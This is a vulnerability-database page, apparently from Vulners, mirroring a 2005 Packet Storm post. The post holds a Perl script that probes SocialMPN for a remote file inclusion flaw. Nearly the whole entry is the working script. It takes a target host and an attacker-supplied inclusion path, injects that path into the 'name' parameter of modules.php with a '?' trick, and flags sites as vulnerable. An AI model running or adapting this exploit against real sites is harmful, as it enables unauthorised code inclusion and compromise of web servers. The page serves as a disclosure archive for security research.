Lucene search
K

socialMPN.txt

🗓️ 15 Mar 2005 00:00:00Reported by y3dipsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Remote testing of SocialMPN file inclusion vulnerability with Perl script by y3dips for educational use.

Code
`  
  
#!/usr/bin/perl -w  
  
# Remote Testing SocialMPN Remote File Inclusion by y3dips [for testing only]  
# Bug find by zer0-c00l ,   
# Bug published at http://waraxe.us/ftopic-542-0-days0-orderasc-.html  
  
print " * Remote Testing File Inclusion for SocialMPN by y3dips *\n";  
  
require LWP::UserAgent;  
  
if(@ARGV == 2)  
{  
  
$target= $ARGV[0];  
$xploit= $ARGV[1];  
  
  
my $ua = LWP::UserAgent->new;  
$ua->agent("MSIE/6.0 Windows");  
$ua->timeout(10);  
$ua->env_proxy;  
  
$url = "http://$target/modules.php?name=$xploit&file=article&sid=2";  
# just for trick , use "?" in the last char of your file inclusion path  
  
my $injek = $ua->get($url);  
  
print " -------------------------------\n";  
if ($injek->is_success)   
{  
$injekcek = $injek->as_string;  
if ($injekcek =~ /(HTTP\/1\.0 200 OK)/)   
{ print("\n This Site Maybe Vulnerable \n"); }  
else   
{die $injek->status_line;}  
print " -------------------------------\n";  
}  
}  
  
else{  
print "Use: perl $0 [target] [xplo.txt] \n";  
}   
  
#EOF y3dips(c)2005  
#shout : zer0-c00l , echo staff @ ehco.or.id  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4
21